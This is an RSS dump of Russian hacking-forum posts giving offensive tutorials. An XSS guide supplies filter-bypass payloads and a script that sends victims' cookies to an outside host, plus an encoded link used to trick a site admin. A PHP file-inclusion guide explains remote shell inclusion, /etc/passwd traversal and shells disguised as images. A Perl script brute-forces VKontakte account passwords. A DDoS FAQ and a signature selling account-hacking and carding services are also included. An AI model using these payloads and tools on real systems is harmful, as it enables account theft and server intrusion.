https://rht.apbb.ru/ Russia Hack Team ru-ru Wed, 15 Dec 2010 18:39:06 +0300 MyBB/mybb.ru https://rht.apbb.ru/viewtopic.php?pid=13#p13 <p><strong>freeman211[/b[b]freeman211</strong><br />есть разговор!сможешь помочь???</p> mybb@mybb.ru (саша) Wed, 15 Dec 2010 18:39:06 +0300 https://rht.apbb.ru/viewtopic.php?pid=13#p13 https://rht.apbb.ru/viewtopic.php?pid=12#p12 <p>Привет!!!<br />В этой теме я хочу детально описать Xss от A до Я.<br />Так что начнём...</p> <p><span style="color: green">========================================<br />### Xss это Css =&gt; Cross Site Scripting<br />Чтобы не путать с CSS также назвыают XSS <br />Впервые этот БАГ появился в 1997.<br />=======================================</span></p> <p>### <span style="color: red">Как используют XSS?</span></p> <p>Для начала нам нужно знать что такое Cookie. <br />Если вы знаете, можете пропустить.</p> <p>Cookie служат для сохранения учетных данных сайта на компьютере поситителя.<br />Если вы зарегестрировались на сайте под ником<span style="color: blue"> 'blabluble</span>', то сайт сохранил у вас на компьютере файл с <span style="color: blue">cookies</span>, где закодированы ваши данные.<br />А если вы есть админ и у вас есть доступ к сайту, а я - юзер, который украл у вас(админа) cookies, то я могу спокойно зайти на сайт, и сайт меня определяет как <span style="color: blue">'admin'</span> - у меня будут администраторские права.</p> <p>Для смены(подстановки украденных) кук советую использувать прогу <span style="color: blue">CookieEdit</span> для IE или встроенные функции в Опере и Фаерфоксе.</p> <p>========================================<br />Мы разобрались что такое куки идём дальше...<br />Чтобы перехватить cookies надо найти место на сайте, где можно выполнить XSS-атаку.</p> <p>### <span style="color: red">Что такое XSS-атака?</span></p> <p><span style="color: blue">XSS</span> атаки - это атаки не на сам сайт, а на пользователей сайта. <br /><span style="color: blue">XSS</span> - это недоработка в фильтре, приложении.</p> <p>Бывают пассивные <span style="color: blue">XSS</span> и активные <span style="color: blue">XSS.</span></p> <p>Что такое пассивные XSS?</p> <p>Пассивные - это Xss, которые требуют от жертвы непосредственного участия + есть специфические ограничения и сложности. <br />Поэтому, пассивные XSS не очень ценятся.<br />Например, нужно заставить её пройти по ядовитой ссылке, что потребует социальной инженерии, хитрости.</p> <p>Активные - это XSS, которые, не требуют никаких дополнительных действий со стороны жертвы - ей достаточно лишь открыть страницу с вашим XSS и ява-код выполнится автоматически. <br />Благодаря своей автоматизированности - они очень полезны и ценны.<br />Например, активные хсс существуют в BB-тегах из-за недостаточной фильтрации, когда вы оставляете сообщение на форуме\гостевухе\чате, которое будет всегда активен при каждом обновлении.</p> <p>### Итак, перейду конкретно к тому, как найти на сайте XSS.</p> <p>Как я раньше уже писал что XSS состоит из тегов, они же состоят из <span style="color: blue">html, и javascript языка</span> =).</p> <p>Javascript можно вписывать в html.<br />Можно кодировать, чтобы обойти фильтры. Но об этом позже.</p> <p>Как узнать, что XSS на даном сайте проходит?</p> <p>Ужасна распрастраннёная узявимость типа: <span style="color: blue">&lt;script&gt;alert()&lt;/script&gt;</span> Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился. </p> <p>Самая распостраненая XSS (наблюдаеться во всех местах где плохая фильтрация): <span style="color: blue">&quot;&gt;&lt;script&gt;alert()&lt;/script&gt;</span> <br />Вся суть в &quot;&gt; .<br />Давайте подумаем, что мы делаем, когда вводим в поле <span style="color: blue">&quot;&gt;&lt;script&gt;alert()&lt;/script&gt;</span> , что происходит? <br />Мы вводим в форму <span style="color: blue">&quot;&gt;&lt;script&gt;alert()&lt;/script&gt;</span> какой-то переменной присваиваеться значение поля. Переменная обрабатывается, &quot;&gt; выполняеться, закрывает <br />скрипт и выпролняет <span style="color: blue">&lt;script&gt;alert()&lt;/script&gt;</span> </p> <p>Эта XSS самая распостраненая в поисковиках:<br />Просматриваем все поля сайта и пытаемся вставить <span style="color: blue">&quot;&gt;&lt;script&gt;alert()&lt;/script&gt;</span> <br />Если вышло сообщение - вы нашли XSS...</p> <p>### А как определить есть фильтр или нет?</p> <p>Просто в любое поле вводим: '<span style="color: blue">';!--&quot;&lt;fuck&gt;=&amp;{()}</span><br />Дальше открываем html страничку и ищем слово &quot;fuck&quot;<br />и смотри последующие сиволы.. </p> <p>Если &lt;&gt; так и остались то это перваый признак уязвимости - значит фильтр имеет дырку. <br />Если ,&quot;'\ символы остались такими, как были введены - это второй признак уязвимости - возможные дополнительные символы к последующей XSS атаке. <br />Затем, если открыв HTML, вы не обнаружили &lt;&gt; то скорее всего дырка в фильтре. <br />Если открыв HTML вы обнаружили, что &lt;&gt; заменены на другие символы, то это облом - фильтр по крайней <br />мере функционирует нормально. <br />Возможно еще ввести в поле для проверки фильтрации вот так: <span style="color: blue">&quot;&gt;&lt;&gt;'&quot;`,/\?@%</span></p> <p>Рассмотрим случай если фильтр съедает &lt;&gt; </p> <p>В этом случае существует вероятность дырки. <br />К примеру, у фильтра условие съедать <span style="color: blue">&lt;script&gt;,&lt;&gt;</span> и . <br />Тогда пробуем <span style="color: blue">&lt;zxcvbnzxc792&gt;</span> и смотрим, если не съелось - нашли дырку...дальше можно составить боевой XSS-скрипт.</p> <p>Ещe существует метод вложенного скрипта, к примеру вот так: <br /><span style="color: blue">&lt;sc&lt;script&gt;ript&gt;alert()&lt;/sc&lt;/script&gt;ript&gt;</span> <br />это, если фильтр не оч. сильный и плохо фильтрует. </p> <p>Еще можно попробовать во так: <br /><span style="color: blue">&gt;&gt;&gt;&gt;&lt;&lt;script</span> бывает, что фильтр подсчитывает откр. и закр. скобки и закрывает сам. Сначало фильтрует, а потом закрывает... что дает нам дырку к инъекции скрипта. </p> <p>Частенько бывает что фильтр дополняет скрипт, к примеру вот этим :<br /><span style="color: blue">http://******.ru/trye.asp?sessionID=&quot;&gt;&lt;IMG%20SRC=&quot;javascript:alert( ); </span></p> <p>Фильтр смотрит, что ничего опасного в <span style="color: blue">&lt;IMG%20SRC=&quot;javascript:alert</span>(); нет, закрывает и тем самым <br />выполняя скрипт. </p> <p>Еще конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и вставить код. </p> <p>Все надо пытаться методом проб и ошибок искать...<br />Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра. <br />Методом тыков понять, как фильтр работает, есть ли у него недоработки. <br />Если фильтр плохой, мы всегда можем вставить скрипты.</p> <p>### Активные XSS</p> <p>Тут надо использовать разрешенные теги и прекрываясь ими, надо выполнить запрос. </p> <p>Например, теги url,bb,img. <br />Весь смысл вставки заключается в том, что нам надо встроить запрос в париметр img или url. У Img есть много парметров кроме src и alt.<br />Этот баг очень часто используется на форуме, в гостевухах...</p> <p>Рассмотрим активные XSS.</p> <p>Предупреждения!!!<br />еги [fon*t],[<span style="color: blue"></span>im*g],[ur*l] пишутса с * для того, штобы они не использовались данным форумом.<br />Для использувания этих тегов удалите *. </p> <p>К примеру просмотрим форум на наличие использования тегов <span style="color: blue">[fon*t],[im*g],[ur*l]</span> и попытаться вставить в них скрипт или комбинировать их.:</p> <p>[<span style="color: lime">im*g]httр://www.qwewqw.ru/1.jpg[/im*g]</span> Выходит крестик...значит img используется и мы его подобрали (просто дело в том, что бывает img включен, а админы из создания сообщения его убирают, мол картинки вставлять нельзя и бывает он в использовании <br />разной формы) если крестика нет...а висит всего надпись, то попробуйте еще так: <br /><span style="color: lime">[im*g src=httр://www.qwewqw.ru/1.jpg]</span></p> <p>Ну так вот к примеру мы добились крестика этим:<br /><span style="color: lime">[im*g]httр://www.qweqw.ru/1.jpg[/im*g]</span></p> <p>Проверим держит ли фильтр пробел, добавляем пробел после расширения jpg :<br /><span style="color: lime">[im*g]httр://www.qweqw.ru/1.jpg [/im*g] </span><br />если крестик есть - тогда всё ОК.</p> <p>Далее существуют у img параметры dynsrc и lowsrc которые держат яваскрипт. Пытаемся к примеру вставить: <br /><span style="color: lime">[im*g]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/im*g]</span> <br />проверяем, отсылаем - появиться сообщение - значит нашли активную XSS и вместо alert() можете вставить любой скрипт. </p> <p>Если фильтр не сдался попробуйте так: <br /><span style="color: blue">[[im*g]http://www.qweqw.ru/&quot;/dynsrc=&quot;javascript:alert()&quot;/1.jpg[/im*g]<br />и im*g]http://www.qweqw.ru/&quot;/dynsrc=&quot;javascript:alert()&quot;/1.jpg[/im*g]<br />и <br />[im*g]http://www.qwewqw.ru/&quot;/dynsrc=javascript:alert()/1.jpg[/im*g]</p> <p>Если с приведённых примеров получился крестик, то httр://www.qweqw.ru/1.jpg заменяем на адрес сниффера.<br /></span><br />Бывают случаи, когда jpg отключен админом.</p> <p>###Мы всё время делали коды типа:</p> <p><span style="color: blue">&lt;script&gt;alert('HakNet')&lt;/script&gt;<br />javascript:alert('HakNet')<br />javascript:alert('HakNet')/1.jpg и так далие..</span><br />Но они никакой пользы не принесли, это просто коды для проверки(тестировки) на Xss.</p> <p>Вот скрипт:<br /><span style="color: blue">&lt;script&gt;<br />img = new Image();<br />img.src = &quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;<br />&lt;/script&gt;<br />Он уже ворует куки =)</span></p> <p>###Как его подставить к ссылке с Xss?</p> <p><span style="color: blue">Да очень легко...<br />Есть несколко вариантов:<br />- 1)делаем вот так:<br />http://*****.ru/free?p='&gt;&lt;script&gt;img=new Image();img.src=&quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;&quot;+document.cookie;&lt;/script&gt;<br />где **** сайт с Xss.</p> <p>Вот сам составленый скрипт:<br />'&gt;&lt;script&gt;img = new Image();img.src=&quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;&lt;/script&gt;</p> <p>- 2)Можно ещё делать вот так:<br />http://*****.ru/free?p='&gt;&lt;script src=http://haknet.h16.ru/script/js.js&gt;&lt;/script&gt;<br />где обращаетса к <a href="http://haknet.h16.ru/script/js.js" rel="nofollow" target="_blank">http://haknet.h16.ru/script/js.js</a></p> <p>а в js.js есть:</span><br /><span style="color: blue">img=new Image();img.src=&quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;<br />этот способ более надёжен.</p> <p>Но как я уже писал - иногда бывают затруднения с фильтрами на сайте (не прокатывает наш скрипт).<br />Тогда нужно подумать, как его обойти.<br />Можно просто нечто добавить, нечто поменять, или удалить в скрипте.<br />Но есть более надёжным вариант, когда мы просто закодируем скрипт. Для этого есть много прог. <br />Есть такой сайт как <a href="http://ha.ckers.org/xss.html" rel="nofollow" target="_blank">http://ha.ckers.org/xss.html</a> (кодировщик-дэкодировщик).<br /></span><br />Вот пример:<br /><span style="color: blue">%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E<br /></span><br />это был закодированный:</p> <p>http://*****.ru/free?p='&gt;&lt;script src=http://haknet.h16.ru/script/js.js&gt;&lt;/script&gt;</p> <p>- 3) Особенно шифрование необходимо не только для обмана фильтров, но и для обмана АДМИНА при использовании ПАССИВНОЙ ХСС.</p> <p>Вот такой пример на основе социальной инженерии.<br />Ищем контакт с админом форума бросаем в форуме ему линк на свой сайт, и говориш типа так &quot;клевая фича есть на сайте&quot; и так дале в том же духе. <br />А на нашем сайте будет как вы уже догадались =) вот ето скрипт:</p> <p><span style="color: blue">&lt;script language=&quot;JavaScript&quot;&gt; <br />document.location.href=&quot;%68%74%74%70%3A%2F%2F%2A%2 A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&quot; <br />&lt;/script&gt;</span></p> <p>Что делает document.location.href вы спросите меня? )).. это ява-код, который без запроса переходит на указаной сайт Так чо ж у нас получается, дали мы линк админу, и он зашел на наш сайт, вот что делается.. его быстро бросает на</p> <p><span style="color: blue">%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E</span><br />а это уже и есть наш Xss в зашифрованом виде.</p> <p>Примечание: это подействует только тогда, когда Xss будет принадлежать админу сайта которому вы бросили линк... <br />Иными словами ТРУДНОСТЬ ПАССИВНОЙ ХСС состоит в том, что уязвимость может быть использована ТОЛЬКО, если жертва АВТОРИЗОВАНА на уязвимом сайте!!!<br />__________________<br />- делаю ProjectDrops (дроп проекты)<br />- услуги вбивалы<br />- провожу взлом аккаунтов онлайн игор, чатов<br />- провожу взлом любых аккаунтов почтовых служб (mail.ru, yandex.ru, ukr.net...)<br />- провожу взлом аккаунтов vkontakte.ru<br />- пишу сайты с потдержкой (php,mysql)</p> mybb@mybb.ru (freeman211) Tue, 03 Feb 2009 20:15:40 +0300 https://rht.apbb.ru/viewtopic.php?pid=12#p12 https://rht.apbb.ru/viewtopic.php?pid=11#p11 <p><span style="color: red">[php injection]</span></p> <p>Пхп инъекция довольно распространённый баг, чтобы его Эксплуатировать, не обязательно быть мега гением!<br /><span style="color: blue">ПОЕХАЛИ</span><br />Мы попали на страницу Типа:</p> <p>wwwsite/index.php?url=santaclaus или wwwsite/index.php?url=santaclaus.php или wwwsite/index.php?url=santaclaus.htm итд<br /><span style="color: yellow">в коде есть Include (&quot;$index.php&quot;);</span><br />Теперь пробуем забить вместо santaclaus что-нить другое. Например kutak</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site/index.php?url=kutak</pre></div></div></div><p>Результат бывает разный</p> <p><span style="color: red"><br />Рассмотрим 4 варианта </span><br /><span style="color: yellow">[Первый вариант]</span></p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 6em"><pre>Warning: main(kutak): failed to open stream: No such file or directory in /var/www/site/index.php on line 27 Warning: main(): Failed opening 'kutak' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/site/index.php on line 27</pre></div></div></div><p>Тут всё без гемора(main(kutak) никакого расширения не приписывается) идём регаем себе сайт: Можно даже <span style="color: lime">на народе(Главное, чтоб shell скрипт не выполнялся, либо убираем права у себя на хосте со скрипта, либо идём на narod.ru И регаем сайт там, там пхп скрипты не выполняются, так как не поддерживаются, если Shell скрипт имеет права на выполнение у вас на хосте, то ничего не выйдет )</span></p> <p>Мы зарегали сайт</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>_www.hacker.narod.ru/shell.php</pre></div></div></div><p>Идём обратно и вставляем наш шелл(Инклудим его)</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>http://.site/index.php?url=http://site/index.php?url=hacker.narod.ru/shell.php</pre></div></div></div><p>Если появляется шелл, то всё прошло успешно... НО не факт что код выполнится нормально, иногда админы убирают права на выполнение и наш шелл имеет <span style="color: lime">&quot;NOBODY&quot;</span> Тут ничего не поделаешь, можно ходить по директориям, но ничего изменять, записывать нельзя. Если права на выполнение нормальные, заливаем себе нормальный шелл и не паримся с неудобствами, (А то когда шелл когда шелл блестает на фоне обычного дизайна сайта, нас как-то это бесит)<br />ТУТ ВСЁ ИДЁМ ДАЛЕЕ<br /><span style="color: yellow"><br />[Второй вариант]</span></p> <p>Мы ввели:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site/index.php?url=kutak</pre></div></div></div><p>Нам выдало</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 6em"><pre>Warning: main(kutak.php): failed to open stream: No such file or directory in /var/www/site/index.php on line 27 Warning: main(): Failed opening 'kutak.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/site/index.php on line 27</pre></div></div></div><p>МЫ видим, что расширение уже написано(kutak.php)<br />Давайте рассмотрим если мы пойдём так же как в первом случае</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>http://.site/index.php?url=http://site/index.php?url=hacker.narod.ru/shell.php</pre></div></div></div><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 6em"><pre>Warning: main(http://site/index.php?url=hacker.narod.ru/shell.php.php): failed to open stream: No such file or directory in /var/www/site/index.php on line 27 Warning: main(): Failed opening 'http://site/index.php?url=hacker.narod.ru/shell.php.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/site/index.php on line 27</pre></div></div></div><p><span style="color: red">Мы видим (shell.php.php) расширение дописалось и поэтому ничего не вышло</p> <p>А теперь как правильно</span></p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>http://.site/index.php?url=http://site/index.php?url=http://hacker.narod.ru/shell</pre></div></div></div><p>брали расширение, оно автоматом дописывается, и мы получаем шелл, дальше действуем как хотим.</p> <p>&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;<span style="color: yellow">&#160; &#160; &#160; &#160;[Третий вариант вариант]</span></p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 10.5em"><pre>&lt;? .. Include (&quot;$index.html&quot;); … ?&gt;</pre></div></div></div><p>Расширение html не даст вам толку, поэтому возможен только локальный инклуд</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 6em"><pre>Warning: main(kutak.html): failed to open stream: No such file or directory in /var/www/site/index.php on line 27 Warning: main(): Failed opening 'kutak.html' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/site/kutak.html on line 27</pre></div></div></div><p>Итак, я остановился на локальном инклуде: Млжно смотреть файлы на сервере таким образом</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 10.5em"><pre>www.site/index.php?url=/etc/passwd www.site/index.php?url=../../../../../../../etc/passwd или www.site/index.php?url=../index.php www.site/index.php?url=index.php</pre></div></div></div><p>Если хотим видеть больше(не только html файлы) добавляем нулевой байт! %00 типа</p><div class="quote-box quote-main"><blockquote><p>www.site/index.php?url=/index.php%00</p></blockquote></div><p><span style="color: red">тогда мы сможем видеть и файлы c Другим расширением<br />Ну читаем мы файлы и шо дальше?<br /></span><br />По идее ничего... Но если есть на сайте куда можно залить информацию, то даже много чего можно замутить... Например можно заливать куда нить фотографии и картинки (*.gif, *.jpg) <br />Заливаем фото только не своё(Ато будет ваше фото а под ним: ХАкер вася пытался взломать нас и залил своё фото на обозрение, шутка, к теме)!!!Мы заливаем файл Картинки с содержанием php шелла то есть обычный шелл только с расширением *.jpg, узнаем куда залилось<br />Далее его можно проинклудить пусть мы залили его в wwwsite/images/shell.jpg</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 7.5em"><pre>www.site/index.php?url=/images/shell.jpg или www.site/index.php?url=../images/shell.jpg</pre></div></div></div><p>У нас шелл в кармане!!! ДАлее делаем что хотим.<br />можно ещё локальным инклудом откопать и паролли, но это уже не для этой темы<br /><span style="color: yellow">[четвёртый вариант вариант]</span></p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 10.5em"><pre>&lt;? .. Include (&quot;$patch/papka/file.php&quot;); … ?&gt;</pre></div></div></div><p>Видим: Дописывается расширение php и перед ним стоит папка &quot;papka&quot;<br />Идём на свой сайт на народе создаём у себя папку: &quot;papka&quot; и заливаем туда наш file.php</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>http://hacker.narod.ru/papka/file.php</pre></div></div></div><p>Теперь заряжаем тал:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site/index.php?url=http://hacker.narod.ru</pre></div></div></div><p>Автоматически добавляется papka/file.php</p> <p>Опять мы получаем шелл! ЕЕЕЕ</p> <p>Это всё, что я хотел рассказать. По взлому, <span style="color: red">теперь защита.</span></p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 22.5em"><pre>&lt;? .. if (file_exists(&quot;$page.php&quot;)) //(Если файл существует=&gt;Инклудить) { Include (&quot;$page.php&quot;); } Else //(Если нет =&gt; Шлём взломщика на куй) { Echo &quot;ERROR!&quot;; } … ?&gt; ФИЛЬТР - НУ КАК ЖЕ БЕЗ НЕГО??</pre></div></div></div><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 10.5em"><pre>$index=str_replace(&quot;/&quot;,&quot;&quot;,$index); $index=str_replace(&quot;.&quot;,&quot;&quot;,$index); $index=str_replace(&quot;:&quot;,&quot;&quot;,$index); $index=str_replace(&quot;'&quot;,&quot;&quot;,$index); итд</pre></div></div></div> mybb@mybb.ru (freeman211) Tue, 03 Feb 2009 20:06:49 +0300 https://rht.apbb.ru/viewtopic.php?pid=11#p11 https://rht.apbb.ru/viewtopic.php?pid=10#p10 <p><span style="color: red">Что такое ддос атака как реализуеться и прочее FAQ<br /></span><br />Как всегда решил написать интересную статью</p> <p><span style="color: blue">Введение:<br /></span><br />-ДДос сейчас стал очень актуальным<br />-(ведь не нужно много мозгов чтобы убрать на некоторое время сервер)<br />-Как вы наверно знаете ддос реализуеться через многократные<br />-подключения в серверу + отсылкой данных (на разные сервесы)<br />- Например есть обычная http атака (зараженные комьпютеры <br />-многократно открывают страницу и тем самым нагружая сервер<br />-(обычно атака идёт с большого количества комьютеров) )</p> <p>===================================</p> <p>Теперь самое интересное:</p> <p><span style="color: blue">ping attack:</span></p> <p>Зараженные комьютеры постоянное время посылают ICMP запросы..</p> <p>Сервер нагружаеться и падает... </p> <p>Защитой от этой атаки являеться простое отключение ответа на пинг</p> <p>-------</p> <p><span style="color: blue">http attack:<br /></span><br />Как я уже рассказал сначало http флуд</p> <p>происходит через постоянное открытие сайта (ресурса) </p> <p>Как вы понимаете если с 1000 комьютеров постоянно открывать </p> <p>однавременно сайт загрузка на сервер сильно возрастёт что приведёт к </p> <p>падению сервера </p> <p>Обычно http флуд премияться на форумах где есть работа с базой </p> <p>данных (частые соединения с базой сильно грузят серв )</p> <p>Защитой от http флуда может послужить ввод капчи на странице...</p> <p>--------------</p> <p><span style="color: blue">udp attack</span></p> <p>udp флуд это постоянная отправка на сервак UDP пакетов</p> <p>как правило на разные порты... щас этот метод уже не так опасен...</p> <p>--------------</p> <p>Ошибки в скрипта , программах</p> <p>Как все знают существует ддос на скрипты (ошибки в скриптах)</p> <p>Например таже самая ошибка не закрытия соединения с базой может </p> <p>привести к плачевным событиям.</p> <p>Вообщем суть в том что атакующий ищет в системе места которые </p> <p>наиболее нагружает серв и уже ддосит их (больше относиться к http флуду )</p> <p>Или разработчик забыл сделать обработку длинных запросов.. что может </p> <p>привести к отказу в обслуживании (частый случай )</p> <p>====================</p> <p>Итог хочу сказать я против ддос атак и что ддосить плохо</p> <p>(c) Dr. Em@s</p> mybb@mybb.ru (freeman211) Tue, 03 Feb 2009 19:52:40 +0300 https://rht.apbb.ru/viewtopic.php?pid=10#p10 https://rht.apbb.ru/viewtopic.php?pid=9#p9 <p><span style="color: red">[*] Как Взломать аккаунт вконакте?</span></p> <p>1;) брут</p> <p>2;) троян</p> <p>3;) СИ + ФЕЙК</p> <p>4;) через мыло</p> <p>5;) Небольшой прикол.</p> <p>Брутфорс:</p> <p>Брутфорс программа для подбора пароль как по словарю так и рандомно.</p> <p>Вот вам перл скрипт чтобы запустить его вам необходимо скачать актив перл. (Если у кого есть ещё бруты выкладываем.)</p> <p>$dic = ‘passl.txt’; #словарь паролей<br />$id = 111111; #id цели<br />$mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40<br />$threads = 4; #количество потоков</p> <p>Конфигурируете скрипт запускаете. Незабываем скачать словарь для брута. Скачать их можно --<a href="http://forum.whack.ru/showthread.php?t=648" rel="nofollow" target="_blank">Это интересно</a><span style="color: red">ТУТ</span></p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre>#!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; ###################################### # C!klodoL # vkontakte.ru bruteforce with multi-threads ###################################### $dic = ‘passl.txt’; #словарь паролей $id = 111111; #id цели $mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков ###################################### open (pass, ”&lt;$dic”); Next: @pass = pass(); for(0..$threads) {$trl[$_] = threads-&gt;create(\&amp;Brut, $_);} for(@trl) { $_-&gt;join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5-&gt;hexhash($pass); $sock = IO::Socket::INET-&gt;new(Proto=&gt;’tcp’,PeerAddr=&gt;’vkontakte.ru’,PeerPort=&gt;80); print $sock ”HEAD http://vkontakte.ru/ HTTP/1.0\r\n”. ”Host: vkontakte.ru\r\n”. ”Accept: */*\r\n”. ”Content-Type: application/x-www-form-urlencoded\r\n”. ”User-Agent: Mozillo\r\n”. ”Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n”. ”Connection: close\r\n\r\n”; $answ = &lt;$sock&gt;; close $sock; print ”$pass $answ”; if ($answ =~ /302/){ open (good, ‘&gt;&gt;good.txt’); print good ”$id:$pass:$md5\n”; print ”$id:$pass:$md5\n”; close good; exit;} } } goto Next; sub pass { my (@mas); while ( ){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; }</pre></div></div></div> mybb@mybb.ru (freeman211) Tue, 03 Feb 2009 19:26:59 +0300 https://rht.apbb.ru/viewtopic.php?pid=9#p9